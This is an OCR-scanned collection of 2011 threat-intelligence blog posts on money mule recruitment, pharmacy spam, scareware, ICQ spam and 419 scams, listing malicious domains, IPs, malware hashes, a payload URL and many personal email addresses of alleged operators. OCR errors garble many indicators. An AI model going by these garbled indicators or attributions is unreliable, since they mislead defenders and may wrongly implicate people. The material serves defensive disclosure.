UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 
USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmail.ru 
Name servers of notice: 

NSl.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: 
ached@yourisp.ru 

NS1.NNSQUE.CC - Email: amok@cheapbox.ru 

NSl.OLIVAU.CC - Email: bop@cheapbox.ru 

NS1.PAGEREDNS.CC - 178.162.152.77 (AS28753) - Email 
freer@free-id.ru 

NS1.SURPLUSUSA.CC - 209.159.156.162 (AS19318) - 
Email: skulk@ppmail.ru 



NS1.TVSILVAU.CC - Email: fact@ppmail.ru 

NSl.UKNSSPAeE.ee - 69.10.44.190 (AS19318) - Email: 
gravy@ca4.ru 

nsl.uksource.ee - 69.10.44.189 (AS19318) - Email: 
liver@cheapbox.ru 

NSl.USABONDS.ee - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: 
bold@yourisp.ru 

NS2.COUKSNS.CC - 122.70.148.179 (AS55462) - Email: 
preen@ppmail.ru 
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ns2.gbtrade.ee - 66.199.236.114 (AS15149) - Email: 
ct@yourisp.ru 

NS2.OLIVAU.CC - Email: bop@cheapbox.ru 

NS2.RINGTONS.CC - 66.199.236.115 (AS15149) - Email: 
aaron@cheapbox.ru 

NS2.TVSILVAU.CC - Email: fact@ppmail.ru 

NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: 
tile@yourisp.ru 

NS2.ZONENSUK.CC - 178.162.181.11 (AS28753) - Email 
rooms@ppmail.ru 

NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: 
bold@yourisp.ru 



NS3.FOLOWDNS.CC - 178.162.181.11 (AS28753) - Email: 
dyed@bz3.ru 

NS3.SDNSAU.ee - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.ee - 69.50.192.97 (AS18866) - Email: 
skulk@ppmail.ru 

NS3.TVSILVAU.ee - Email: fact@ppmail.ru 

NS3.UKCCONS.ee - 178.162.181.11 (AS28753) - Email: 
ted@cheapbox.ru 

NS3.UKDNS.CC - 66.199.236.116 (AS15149) - Email: 
append@free-id.ru 

ns3.ukearnings.ee - 178.162.181.11 (AS28753) - Email: 
bf@free-id.ru 

ASs of notice using standart nsl;ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy 
Secaucus, NJ 07094 +1.201.605.1425 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to 
transactions inventory" 

With the [4]localization and standardization/template- 
tization of the entire money mule recruitment 
process an every day's reality, quality assurance and 
diversification of the markets/market segments in order to 
increase the 



probability of successful social engineering attack, will start 
taking place. Moreover, the current template driven 

recruitment ecosystem will inevitably start taking 
advantage of basic concepts such as geolocation and 
content 

cloaking, in order to once again increase the probability for 
converting a web site visitor into a mule. 

At an invite-only conference that I attended in September, 
2010, someone from the audience asked me a 

rather interesting question. Does it really matter how many 
mules are recruited by a particular syndicate, and most 

importantly, can we talk about average number of 
days/weeks/hours by the time the mule gets busted, and 
can no 

longer offer his/her services? 

In the long term, we're inevitably going to witness the 
migration from building inventories of mules to transaction- 

driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. 

The number of possible transactions with success rates 
based on historical performance, combined with an infinite 

loop of recruitment is what will drive the entire mule 
recruitment ecosystem. 

Related posts: 

[5]The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 



[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahool's Web Hosting 

[10] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] Inside a Money Laundering Group's Spamming 
Operations 
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[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 
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monev-mule-recruitment.html 
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6. http://ddanchev.blo as pot.com/2Q10/Q4/keepin a -mone v- 
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7. http://ddanchev.blo as pot.com/201Q/Q3/monev-mule- 
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8. http://ddanchev.blo as pot.com/2QlQ/Q3/keepin a -mone v- 
mule-recruiters-on-short.html 

9. http://ddanchev.blo as pot.com/2QlQ/Q3/monev-mule- 
recruiters-on-vahQos-web.html 

10. http://ddanchev.blo as pot.com/2QlQ/Q2/dissectin a- 
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14. http://ddanchev.blo as pot.com/2QQ9/lQ/standardizin a- 
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February 
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(2011-02-09 12:43) 

Whatever the cybercrime marketplace demands, the 
cybercrime marketplace supplies. 
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Spamvertised Portfolio of 

Fraudulent/Pharmaceutical Domains (2011-02-14 
20:14) 

Just in time for Saint Valentin's days, pharmaceutical 
scammers have switched their localized templates to a more 


romantic theme. 




















The domains have been registered using three separate 
Yahoo! Mail accounts, and are all responding to a sin¬ 
gle IP - 115.239.229.196; AS4134, CHINA-TELECOM China 
Telecom with four currently active [l]ZeuS C &Cs within 

the same AS - aiyanxinxi.com; wawnet.net; 
www.zuihouyi.com;nascetur.com. 

abpillsw.ru - Email: nikitapetuhov@yahoo.com 

alpillsw.ru - Email: nikitapetuhov@yahoo.com 

alypillsw.ru - Email: nikitapetuhov@yahoo.com 

annpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 

asapillsm.ru - Email: alexeycheremisinov@yahoo.com 

barpillsw.ru - Email: nikitapetuhov@yahoo.com 

bazpillso.ru - Email: muzalevskayaekaterina@yahoo.com 

bupillsp.ru - Email: muzalevskayaekaterina@yahoo.com 

capillso.ru - Email: muzalevskayaekaterina@yahoo.com 

carpillsw.ru - Email: nikitapetuhov@yahoo.com 

celpillsw.ru - Email: nikitapetuhov@yahoo.com 

chapillsm.ru - Email: alexeycheremisinov@yahoo 
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chapillso.ru - Email: muzalevskayaekaterina@yahoo.com 
chpillso.ru - Email: muzalevskayaekaterina@yahoo.com 



cinpillsp.ru - Email: nikitapetuhov@yahoo.com 
conpillsw.ru - Email: alexeycheremisinov@yahoo.com 
copillsm.ru - Email: alexeycheremisinov@yahoo.com 
copillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
corpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
crpillsm.ru - Email: alexeycheremisinov@yahoo.com 
depillsm.ru - Email: alexeycheremisinov@yahoo.com 
depillso.ru - Email: muzalevskayaekaterina@yahoo.com 
despillsw.ru - Email: nikitapetuhov@yahoo,cim 
dipillsm.ru - Email: alexeycheremisinov@yahoo.com 
dipillsw.ru - Email: nikitapetuhov@yahoo.com 
duppillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
enkpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
estpillsm.ru - Email: alexeycheremisinov@yahoo.com 
ethpillsm.ru - Email: alexeycheremisinov@yahoo.com 
exapillsw.ru - Email: nikitapetuhov@yahoo.com 
flipillso.ru - Email: alexeycheremisinov@yahoo.com 
flpillso.ru - Email: alexeycheremisinov@yahoo.com 
funpills.ru - Email: muzalevskayaekaterina@yahoo.com 
glpillso.ru - Email: alexeycheremisinov@yahoo.com 



haupillso.ru - Email: alexeycheremisinov@yahoo.com 
hipills.ru - Email: muzalevskayaekaterina@yahoo.com 
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invpillso.ru - Email: alexeycheremisinov@yahoo.com 
isapillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
itepillsw.ru - Email: nikitapetuhov@yahoo.com 
jopillso.ru - Email: alexeycheremisinov@yahoo.com 
kipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
kipillsw.ru - Email: nikitapetuhov@yahoo.com 
krpillsw.ru - Email: nikitapetuhov@yahoo.com 
lopillso.ru - Email: alexeycheremisinov@yahoo.com 
lopillsw.ru - Email: nikitapetuhov@yahoo.com 
mapillso.ru - Email: alexeycheremisinov@yahoo.com 
marpillsw.ru - Email: nikitapetuhov@yahoo.com 
metpillso.ru - Email: alexeycheremisinov@yahoo.com 
monpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
nopillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
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odpillsw.ru - Email: nikitapetuhov@yahoo.com 
panpillsw.ru - Email: nikitapetuhov@yahoo.com 
phpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsbi.ru - Email: simakovs@yahoo.com 
pillsly.ru - Email: alexeycheremisinov@yahoo.com 
pillsnk.ru - Email: alexeycheremisinov@yahoo.com 
pillsoep.ru - Email: alexeycheremisinov@yahoo.com 
pillsoes.ru - Email: alexeycheremisinov@yahoo.com 
pillsoff.ru - Email: alexeycheremisinov@yahoo.com 
pillsogn.ru - Email: alexeycheremisinov@yahoo.com 
pillsois.ru - Email: alexeycheremisinov@yahoo.com 
pillsoke.ru - Email: alexeycheremisinov@yahoo.com 
pillsokt.ru - Email: alexeycheremisinov@yahoo.com 
pillsong.ru - Email: alexeycheremisinov@yahoo.com 
pillsont.ru - Email: alexeycheremisinov@yahoo.com 
pillsooc.ru - Email: alexeycheremisinov@yahoo.com 
pillsopa.ru - Email: alexeycheremisinov@yahoo.com 
pillsore.ru - Email: alexeycheremisinov@yahoo.com 
pillsosa.ru - Email: alexeycheremisinov@yahoo.com 
pillsosl.ru - Email: alexeycheremisinov@yahoo.com 






pillsoti.ru - Email: alexeycheremisinov@yahoo.com 
pillsouc.ru - Email: alexeycheremisinov@yahoo.com 
pillsove.ru - Email: alexeycheremisinov@yahoo.com 
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pillspba.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsper.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspiz.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspnc.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspne.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspno.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspns.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppt.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspra.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspre.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsprg.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspsa.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspss.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspst.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspti.ru - Email: muzalevskayaekaterina@yahoo.com 






pillsqu.ru - Email: alexeycheremisinov@yahoo.com 
pillswal.ru - Email: nikitapetuhov@yahoo.com 
pillswam.ru - Email: nikitapetuhov@yahoo.com 
pillswar.ru - Email: nikitapetuhov@yahoo.com 
pillswau.ru - Email: nikitapetuhov@yahoo.com 
pillswcu.ru - Email: nikitapetuhov@yahoo.com 
pillswed.ru - Email: nikitapetuhov@yahoo.com 
pillswep.ru - Email: nikitapetuhov@yahoo.com 
pillswer.ru - Email: nikitapetuhov@yahoo.com 
pillswet.ru - Email: nikitapetuhov@yahoo.com 
pillswey.ru - Email: nikitapetuhov@yahoo.com 
pillswis.ru - Email: nikitapetuhov@yahoo.com 
pillswng.ru - Email: nikitapetuhov@yahoo.com 
pillswol.ru - Email: nikitapetuhov@yahoo.com 
See also: 

• [2]lnside an affiliate spam program for 
pharmaceuticals 

• [3]Survey: Millions of users open spam emails, click 
on links 

• [4]Microsoft's Bing invaded by pharmaceutical 
scammers 






pillswre.ru - Email: nikitapetuhov@yahoo.com 
pillswss.ru - Email: nikitapetuhov@yahoo.com 
pillswti.ru - Email: nikitapetuhov@yahoo.com 
pillswtt.ru - Email: nikitapetuhov@yahoo.com 
pillswwa.ru - Email: nikitapetuhov@yahoo.com 
pillszva.ru - Email: nikitapetuhov@yahoo.com 
pillszzi.ru - Email: nikitapetuhov@yahoo.com 
propillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
puppillso.ru - Email: alexeycheremisinov@yahoo.com 
rempillso.ru - Email: alexeycheremisinov@yahoo.com 
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repillso.ru - Email: alexeycheremisinov@yahoo.com 
sipillsw.ru - Email: nikitapetuhov@yahoo.com 
stapillso.ru - Email: alexeycheremisinov@yahoo.com 
supillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
tilpillso.ru - Email: alexeycheremisinov@yahoo.com 
tilpillsw.ru - Email: nikitapetuhov@yahoo.com 
towpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
trpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 



uncpillso.ru - Email: alexeycheremisinov@yahoo.com 

vipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 

whapillsw.ru - Email: nikitapetuhov@yahoo.com 

Name servers of notice, respoding to 115.239.229.196 
(AS4134); 113.23.142.119 (AS38182) and 

78.46.105.205 

(AS24940 - active [5]SpyEye C &Cs at 

www.privathosting.eu; spl.privathosting.eu) 

nsl.advidns.ru 
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nsl.alemedicp.ru 

nsl.annudns.com 

nsl.bacdns.ru 

nsl.bacmedicp.ru 

nsl.bestworlddns.com 

nsl.botedns.com 

nsl.boxdns.ru 

nsl.camdns.ru 

nsl.cashdns.ru 

nsl.caulsdns.com 


nsl.comtdns.com 



nsl.crouadns.ru 


nsl.culldns.com 

nsl.delmedicv.ru 

nsl.dns4work.ru 

nsl.dnsbest.ru 

nsl.dnsbestfind.com 

nsl.dnsoper.com 

nsl.dnsorbi.com 

nsl.dnsroomo.ru 

nsl.dnswork.ru 

nsl.doctorci.ru 

nsl.doctorngee.ru 

nsl.doctorrfix.com 

nsl.doctorude.ru 

nsl.doctorxst.ru 

nsl.doctorxve.ru 

nsl.drdoctorx.ru 

nsl.dromedicp.ru 

nsl.eagreadns.ru 


nsl.elmendns.ru 



nsl.feldns.ru 


nsl.glisdns.com 

nsl.gurndns.ru 

nsl.hardns.ru 

nsl.psidns.com 

nsl.rxshopsmor.ru 

nsl.sighost.ru 

nsl.standns.com 

nsl.subrdns.ru 

nsl.tiodns.com 

nsl.twdoctor.com 

nsl.vodoctorx.ru 

This post has been reproduced from [6]Dancho Danchev's 
blog. 

1. https://zeustracker.abuse.ch/monitor. ph p?as=4134 

2. http://www.zdnet.com/blo a /securitv/inside-an-affiliate- 
s pam-pro a ram-for-pharmaceuticals/2054 

3. http://www.zdnet.com/blo a /securitv/survev-millions-of- 
users-open-spam-emails-click-on-l inks/5889 

4. http://www.zdnet.com/blo a /securitv/microsofts-bin a- 
mvaded-b v- pharmaceutical-scammers/3993 
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5. https://s ove vetracker.abuse.ch/monitor. oh p?as=24940 

6. http://ddanchev.blo as pot.com/ 
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A Diverse Portfolio of Fake Security Software - Part 
Twenty Five (2011-02-15 16:06) 

Scarewere continues occupying the top spots for malicious 
monetization tactics courtesy of the cybercrime ecosys¬ 
tem. Disruption of this monetization chain can take place 
through multiple processes. For instance: 

• Share data with the affected ISP whose customers 
participate in the black hat SEO campaign 

• Target the payment processing gateways, or inform the 
legitimate one 

• Target the the redirector URLs of the campaign 

• Target the affiliate network itself 

• Target the "final output" in the form of scareware domains 

In this we'll expose a portfolio of scaware domains, and will 
target the "final output" of the campaign, in between 
sharing data with community members. As always, what 
originally looks like a low profile campaign, always turns 

into a piece of puzzle from the massive blackhat SEO 
"picture". 







- Detecrion rate for systemwrecksavertingsystem.com 
/scanl/92/freesystemscan.exe 

[1] freesystemscan.exe - Trojan.Win32.FakeAV 
37 

K 

Result: 17/43 (39.5 %) 

MD5 : a69a7fl992ed4607ac0al63d66984f56 

SHA1 : ef089f92881ff6835b76562febdcbc3328340adb 

SHA256: 

993026853e2bbc8846dbda5a90c4f06a9al8b83c9f97fe7bl 

557b03975ebeaff 

- Detection rate for pornhugevideo.com 
/video3/88/f reevideoplugin.exe 

[2] freevideoplugin.exe - Rogue:Win32/FakePAV 
Result: 4/42 (9.5 %) 

MD5 : 8a688d6ebb838f66fl6720f4066cf6c6 

SHA1 : 845e43ad946048346b3d9150ae41fd8f7766ac53 

SHA256: 

db6e3e7a72305d8b36861ed90753555d519bdca5a36aa05 

81ed363ac264cfbce 

Responding to 94.23.105.248 (AS16276): One active 

[3] ZeuS C &C within the AS monasteriodeboltana.es 


accidentspreventingcenter.com - Email: 
contact@privacyprotect.org 

antibreakingsystem.com - Email: 
contact@privacyprotect.org 

antivirusesshield.com - Email: 
contact@privacyprotect.org 

bigvideocams.com - Email: contact@privacyprotect.org 
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componentsprotector.com - Email: 
contact@privacyprotect.org 

hugebigpornmovie.com - Email: 
contact@privacyprotect.org 

hugebigred.com - Email: contact@privacyprotect.org 

hugemoviecams.com - Email: contact@privacyprotect.org 

pcactivitydebugger.com - Email: 
contact@privacyprotect.org 

pcautomaticproblemssolver.com - Email: 
contact@privacyprotect.org 

pccustodianutility.com - Email: 
contact@privacyprotect.org 

pcinspectionutility.com - Email: 
contact@privacyprotect.org 

pcprecautionscenter.com - Email: 
contact@privacyprotect.org 



pcprotectionservant.com - Email: 
contact@privacyprotect.org 

pcriskspreventionscenter.com - Email: 
contact@privacyprotect.org 

pcstabilitymaximizer.com - Email: 
contact@privacyprotect.org 

pctroublessolver.com - Email: 
contact@privacyprotect.org 

pcwardingsystem.com - Email: 
contact@privacyprotect.org 

pornhugevideo.com - Email: contact@privacyprotect.org 

systemanticrashesutility.com - Email: 
contact@privacyprotect.org 

systemattentionutility.com - Email: 
contact@privacyprotect.org 

systemshieldingutility.com - Email: 
contact@privacyprotect.org 

systemsupervisioncenter.com - Email: 
contact@privacyprotect.org 

systemtasksoptimizer.com - Email: 
contact@privacyprotect.org 

systemwrecksavertingsystem.com - Email: 
contact@privacyprotect.org 

taskstweakingutility.com - Email: 
contact@privacyprotect.org 



tubemovievideo.com - Email: contact@pnvacyprotect.org 
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Responding to 76.76.117.101 (AS21793); 78.46.105.205 
(AS24940); 207.58.177.96 (AS25847) and 64.64.3.125 

(AS25847) 

212156dnfgdn.co.cc - Email: audiodius@hotmail.com 

32fdsg3gsg.vv.cc 

androlhala.cz.cc 

bdfnfebne3nf.vv.ee 

bfbf3bfb.vv.ee 

cebandis.cz.ee 

centrihelm.ez.ee 

drelagda.vv.ee 

f23f21fafae.vv.ee 

fdf2fafaf.vv.ee 

gdezdeskto.co.ee 

gdsg342gsgs.vv.ee 

gewheheh4.co.cc - Email: audiodius@hotmail.com 
gfsdg4gs.co.cc - Email: audiodius@hotmail.com 


granims.cz.cc 
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gsdg24gshgr.vv.ee 

gsdg43hsweh.co.cc - Email: audiodius@hotmail.com 

gsegf3gstg3g.vv.ee 

gsg3gsdgseg.co.cc - Email: audiodius@hotmail.com 

gsgsv2vds.vv.ee 

gsgwegweg23g.vv.ee 

hdfg43hshf.co.cc - Email: audiodius@hotmail.com 
hdfh34hdrfhf.co.cc - Email: audiodius@hotmail.com 

hdhfdhdfhdfhdfh.vv.ee 

hfehe3hdfhf.co.cc - Email: audiodius@hotmail.com 
hh3hfdnfdh.co.cc - Email: audiodius@hotmail.com 

hndfdfnfdnxdnf.vv.ee 

ht4hdfgjcjgt.vv.cc 

hu587tiugi.vv.ee 

malakelv.ez.ee 

maridora.vv.ee 

morlunaya.vv.ee 

nvmtymvm.vv.ee 



oghmalak.vv.ee 

oijqujnnnsul.eo.ee - Email: audiodius@hotmail.com 

shalillador.ez.ee 

vsegwgewg.vv.ee 

wefge3gltglg.vv.ee 

yeryeshsdhdhjfdhj.vv.ee 

This post has been reproduced from [4]Dancho Danchev's 
blog. 

Related posts on scareware and blackhat SEO 
monetization: 

[5] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[6] Dissecting a Scareware-Serving Black Hat SEO Campaig 
Using Compromised .NL/.CH Sites 

[7] Dissecting the 100,000+ Scareware Serving Fake 
YouTube Pages Campaign 

[8] Dissecting the Ongoing U.S Federal Forms Themed 
Blackhat SEO Campaign - Part Two 

[9] Blackhat SEO Campaign Hijacks U.S Federal Form 
Keywords, Serves Scareware 

[10] U.S Federal Forms Blackhat SEO Themed Scareware 
Campaign Expanding 

[lljDissecting the Ongoing U.S Federal Forms Themed 
Blackhat SEO Campaign 



[12]The ultimate guide to scareware protection 


[13] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[14] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[15] A Peek Inside the Managed Blackhat SEO Ecosystem 

[16] Dissecting a Swine Flu Black SEO Campaign 

[17] Massive Blackhat SEO Campaign Serving Scareware 

[18] From Ukrainian Blackhat SEO Gang With Love 

[19] From Ukrainian Blackhat SEO Gang With Love - Part Two 

[20] From Ukraine with Scareware Serving Tweets, Bogus 
Linkedln/Scribd Accounts, and Blackhat SEO Farms 

[21] From Ukraine with Bogus Twitter, Linkedln and Scribd 
Accounts 

[22] Fake Web Hosting Provider - Front-end to Scareware 
Blackhat SEO Campaign at Blogspot 

[23] The Ultimate Guide to Scareware Protection 

[24] A Diverse Portfolio of Fake Security Software - Part 
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[25] A Diverse Portfolio of Fake Security Software - Part 
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Bogus Adult Content SPIM-ed Over ICQ (2011-02-16 
13:25) 

A currently SPIM-ed campaign over ICQ attempts to trick the 
end user into becoming a member of a bogus adult 

content offering network, which drives sales through 
spamming. 

The links chain: 

- ow.ly/3V9eu 

- art-spectrum.info/load2/7674/foto.jar - 

178.170.250.12 (AS52000, ALDAN-3-AS LTD "ALDAN-3) 

- video-girl.tv/default.aspx - 81.177.3.250 - Email: 
support@video-people.com (AS8342, RTCOMM-AS OJSC RT- 






















Comm.RU) with two active [l]SpyEye C &Cs within the AS - 

googlemaps4.com (81.176.236.177) and reg.kygalu.ru 

81.177.32.45 - Email: kygalu.ru@r01-service.ru 

- Responding to 178.170.250.12 are also geoinvest.org 
(178.170.250.12) Email: geoinvest@sum.co.ru and 
powerman.ru (178.170.250.12) Email: 
antonvp@yandex.ru 
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- Responding to 81.177.3.250 are: 
vchat.kladoffka.com - Email: sanny_dbroker@mail.ru 
virtualniyseks.in - Email: sereg@hot.ee 
odetih.net - Email: reg@legato.name 

pornoton.net 

russiansgirls.net 

videodevki.ru - Email: prezidentbush@yandex.ru 
video-girl.ru - Email: admin@video-girl.ru 
strip-girl.ru - Email: kinoman-cd@yandex.ru 
webcam-girls.ru - Email: srg _surgut@pisem.net 
videoshowgirls.ru - Email: gbgcnbr@i.ua 
sexy-chat.ru - Email: roman.alexsandr@mail.ru 


f1irtshow.ru - Email: rusproject99@yandex.ru 
chatsexy.ru - Email: roman.alexsandr@mail.ru 
rusprivate.su - Email: sadko-as@rambler.ru 
video-girl.tv - Email: support@video-people.com 
x-chat.tv - Email: x-chat@mail.ru 

This post has been reproduced from [2]Dancho Danchev's 
blog. 

1. https://s ove vetracker.abuse.ch/monitor. oh o?as=8342 

2. http://ddanchev.blo as pot.com/ 
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Sampling 419 Advance Fee Scams Activity - Part Two 
(2011-02-21 13:54) 

Part two of the [IjSampling 419 Advance Fee Scams 
Activity series, once again aims to provide actionable real¬ 
time threat intelligence on a fraudulent segment that 
continues tricking hundreds of thousands of average 
Internet users 

into thinking that they have pending payments, have won 
the lottery, or someone is basically interested in doing 

multi-million dollar business with them. 

The format of the data obtained over the past 24 hours, is 
return email plus the original IP of the sender, 







most of which can be geolocated to African countries. 
hsuehyun@ncut.edu.tw - 116.206.139.254 
peterjohnson299@yahoo.co.jp - 41.218.232.158 
ekwesa@aol.com - 41.138.164.52 
info.hsbcbanktransfer@gmail.com - 41.218.251.239 
SarinaJensB@web.de - 77.70.128.160 
paulmohammed37@yahoo.com - 41.155.81.129 
henriondaniellepaulette@yahoo.fr - 81.91.228.78 
mainstreamfirm001@gmail.com - 41.155.72.26 
wilson201105@hotmail.com - 187.16.224.70 
westernun888union@hotmail.com - 41.191.85.209 
bt.telecomsgroup@live.co.uk - 202.137.234.123 
eco.bankplc.ecobankpl@gmail.com - 41.216.50.26 
kwameowus@aol.com - 41.218.233.50 
richardjsphs@yahoo.co.jp - 190.213.185.93 
mainstreamfirm001@gmail.com - 212.76.68.39 
benardodigor@yahoo.com - 41.211.229.23 
groupbanofafrica@hotmail.com - 189.86.87.204 
wellcometrustloans@post.com - 182.63.1.192 
Iindominic04@rediffmail.com - 41.28.113.153 
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rep _leonbecker@yahoo.cn - 41.218.197.240 
agwa James@yahoo.it - 82.128.1.217 
mrsmarriogloria@yahoo.co.jp - 41.66.8.132 
ralphkoon@yahoo.co.jp - 124.120.130.145 

directorofremittance.centralba@gmail.com - 

89.221.175.11 

Iegalclaimsdepartment2@lankaemail.com - 41.58.67.161 
drbbs@live.com - 111.172.36.231 
pn2812768@gmail.com - 77.246.67.82 
husainali40@gmail.com - 212.52.152.113 
bensonibori@yahoo.com.hk - 82.128.36.25 
mraabull@att.net - 41.210.43.36 
info@westernu.co.uk - 199.255.209.74 
claim _dptupdate@live.com - 82.128.88.173 
alhussein.raisin@yahoo.co.nz - 86.97.120.18 
adrianyrann5@att.net - 70.39.119.122 
drjarry _westl970@qatar.io - 41.222.192.89 
mrgarypalmercode@gmail.com - 41.71.147.248 
diplomaticericb78@globomail.com - 81.91.230.137 



treasuryoffice@cantv.net - 41.0.52.62 
infounl9@oued.org - 41.189.2.105 
fbi _54327@hotmail.com - 82.128.109.76 
s.b.mail@web.de - 74.115.3.69 
maria200495@hotmail.com - 115.132.173.171 
ceckamokai@gmail.com - 41.241.148.81 
ffl23ff69@yahoo.co.nz - 75.126.137.6 
mr.colesify@yahoo.co.uk -115.118.239.95 
benkofi003@aol.com - 41.218.239.140 
investigationcommite2011@gmail.com - 41.211.229.26 
wiesner.heiko@web.de - 41.138.167.198 
kwameowus@aol.com - 41.218.245.220 
kamaruddinabdullah@w.cn -120.141.67.94 
benobiego@rediffmail.com - 67.247.201.204 
See also: 

• [2]419 scammers using Dilbert.com 

• [3]419 scammers using NYTimes.com 'email this 
feature 

• [4]Protection tips for the upcoming FIFA World Cup 
themed cybercrime campaigns 



Historical OSINT remains an inseparable part of the 
CYBERINT gathering practices, hence the continuation of 
the 

Sampling 419 Advance Fee Scams Activity series. 

This post has been reproduced from [5]Dane ho 
Danchev's blog. Follow him [6]on Twitter. 

1. http://ddanchev.blo as Dot.com/2010/06/samplin a -419- 
ad vance-fee-scams-activitv.html 

2. http://www.zdnet.com/blo a /securitv/419-scammers-usin a- 
dilbertcom/3809 

3. http://www.zdnet.com/blo a /securitv/419-scammers-usin a- 
n vtimescom-email-this-featu re/3491 
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4. http://www.zdnet.com/blo a /securit v/ protectiQn-tips-for- 
the-u pcomin a -f i f a - wo r I d -c u p - t h e m ed -c v b e rc r i me-cam p 

aia ns/6610 

5. http://ddanchev.blo as pot.com/ 

6. http://twitter.com/danchodanchev 
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Summarizing Zero Day's Posts for February (2011- 
02-28 15:59) 


[ 1 ] 





























The following is a brief summary of all of my posts at 
ZDNet's Zero Day for February. You can subscribe to my 

[2]personal RSS feed, [3]Zero Day's main feed, or 

follow me on Twitter: 

[4] 

Recommend reading: 

49 

• [5]500,000 stolen email passwords discovered in 
Waledac's cache 

• [6]Report: AV users still get infected with malware 

• [7]Report: Patched vulnerabilities remain prime 
exploitation vector 

01. [8]Researcher demos SMS-based smartphone botnet 

02. [9]500,000 stolen email passwords discovered in 
Waledac's cache 

03. [10]Study: US tops ZeuS hosting infrastructure chart 

04. [ll]Spamvertised Xerox document themed malware 
campaign spreading 

05. [12]New report details the prices within the cybercrime 
market 

06. [13]Report: AV users still get infected with malware 

07. [14]Microsoft disables AutoRun on Windows XP/Vista to 
prevent malware infections 



08. [15]Google intros advanced sign-in feature 

09. [16]Malware Watch: UPS/FDIC; Mobile app; Infected 
ambulance dispatch 

10. [17]Report: Patched vulnerabilities remain prime 
exploitation vector 

11. [18]Bogus Android apps lead to malware 

12. [19]ZeuS crimeware variant targets Symbian and 
BlackBerry users 

13. [20]Researchers spot new Mac OS X malware 

This post has been reproduced from [21]Dancho 
Danchev's blog. Follow him [22]on Twitter. 

1. https://lh5. a oo a leusercontent.com/-n- 
oZ7kPS XE/TWup2Vp4H i l/AAAAAAAAElk/cvb- 
TliEwfM/sl600/ZDNet Zero Dav Fe 

bruarv_2011. pna 

2. http://www.zdnet.com/topics/dancho-i-danchev? 
Q=l&mode=rss&ta a = mantle_skin : content 

3. http://feeds.feedburner.com/zdnet/securit v 

4. http://twitter.com/danchodanchev 

5. http://www.zdnet.com/blo a /securitv/50000Q-stolen-email- 
passwords-discovered-in-waledacs-cache/8045 

6. http://www.zdnet.com/blo a /securitv/report-av-users-still- 
a et-infected-with-mal ware/8108 



























7. http://www.zdnet.com/blo a /securitv/report-patched- 
vulnerabilities-remain-prime-exploitation-vector/8162 

8. http://www.zdnet.com/blo a /securitv/researcher-demos- 
sms-based-smartphone-botnet/8031 

9. http://www.zdnet.com/blo a /securitv/5QQQQQ-stolen-email- 
passwords-discovered-in-waledacs-cache/8045 

10. http://www.zdnet.com/blo a /securitv/studv-us-tops-zeus- 
hostin a -infrastructure-chart/8Q64 

11. http://www.zdnet.com/blo a /securit v/s pamvertised-xerox- 
document-themed-malware-campai a n-spreadin a /8075 

12. http://www.zdnet.com/blo a /securitv/new-report-details- 
the-prices-within-the-cvbercrime-market/8078 

13. http://www.zdnet.com/blo a /securitv/report-av-users-still- 
a et-infected-with-mal ware/8108 

14. http://www.zdnet.com/blo a /securitv/microsoft-disables- 
autorun-on-windows-xpvista-to-prevent-malware-infec 

tions/8123 

